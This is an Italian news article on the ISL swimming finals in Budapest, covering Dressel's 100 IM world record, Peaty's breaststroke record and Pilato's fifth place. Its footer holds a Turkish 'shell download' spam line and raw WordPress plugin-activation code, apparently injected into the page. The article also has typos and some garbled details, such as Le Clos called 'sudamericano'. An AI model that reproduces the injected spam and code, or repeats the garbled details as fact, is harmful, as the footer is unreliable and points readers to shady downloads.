Nuoto, Dressel: record mondiale dei 100 misti: 49’28


A Budapest, nelle finali Isl, l’americano scende di 6 decimi dal precedente primato. Mondiale anche per Peaty nei 100 rana (baby Pilato quinta)

Nelle finali Champions Isl, ultimo atto nella vasca corta di Budapest, Caeleb Dressel polverizza ancora il record mondiale nei 100 misti già nuotati per la prima volta sotto i 50”: dopo i 100 sl, l’americano torna in acqua e stampa 49”28 (da 49”88). È l’8° primato mondiale della rassegna nel 2020, il quarto personale. Dressel aveva sfiorato 35 minuti prima il record mondiale del francese Amaury Leveaux di 44”94 ma migliora il record americano dei 100 sl in 45”08 (da 45”15): per 14 centesimi il primato gommato del 2008 non capitola per mano dell’americano, che infligge 99 centesimi ad un altro francese, Florent Manaudou, passato di due centesimi davanti ai 50 metri in 21”73. Dressel si gioca poi in virata e al tocco il mondiale nei 50 farfalla e tocca nella sua terza gara in 22”09: si salva il brasiliano Santos con il su 21”75.

Pilato quinta

—  

Benedetta Pilato è quinta in 1’04”27 nei 100 rana di super King (1’02”50, a 14 centesimi dal record mondiale): la quindicenne tarantina sente forse per la prima volta il peso della responsabilità ma soprattutto non riesce a carburare e a prendere il ritmo giusto nella prima parte (30”32) per poter puntare al suo record di 1’03”55. Benny finora ha migliorato 5 volte un record italiano. Chi migliora il mondiale nella stessa gara ma al maschile è Adam Peaty, l’olimpionico britannico timbra un favoloso 55”41 per migliorare il suo stesso primato che aveva realizzato la settimana scorsa in 55”49 quando aveva cancellato il 55”61 del sudafricano Cameron Van der Burgh del 2009.

Altre gare

—  

Stupenda incertezza nei 100 sl donne al femminile con record nazionali polverizzati e vinti dalla francese Beryl Gastaldello in 51”38 8che poi fa il favoloso bis nei 100 misti in 57”30 con un’anonima Sjostrom). Chad Le Clos nel 2012 batteva Phelps a Londra nei 200 farfalla: poteva perdere anche dal miglior e neo primatista Tom Shields nella Isl? Per il sudamericano un 1’48”57 risicato di 9 centesimi. Olivia Smoliga polverizza il primato Usa e fa tremare il mondiale di 54”89 dell’australiana Minna Atherton: ora è la terza centista di sempre. Il russo Kliment Kolesnikov stavolta si ferma a 48”82 e non bissa il primato di ieri stabilito in staffetta in 48”58 ma batte il triolimpionico Rya Murphy. Sjobhan Haughey toglie nei 200 sl a Federica Pellegrini il 2° crono alltime (1’51”17 per l’ex record mondiale di Fede): l’asiatica batte Freya Anderson (record inglese) e l’olimpionica di Londra, Allison Schmitt: tre nomi che l’azzurra conosce già bene alla casella “pericolose”. Nei 200 sl uomini, lo scozzese Dung Scott si prende il record britannico in 1’40”25, ovvero il quarto crono di sempre.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );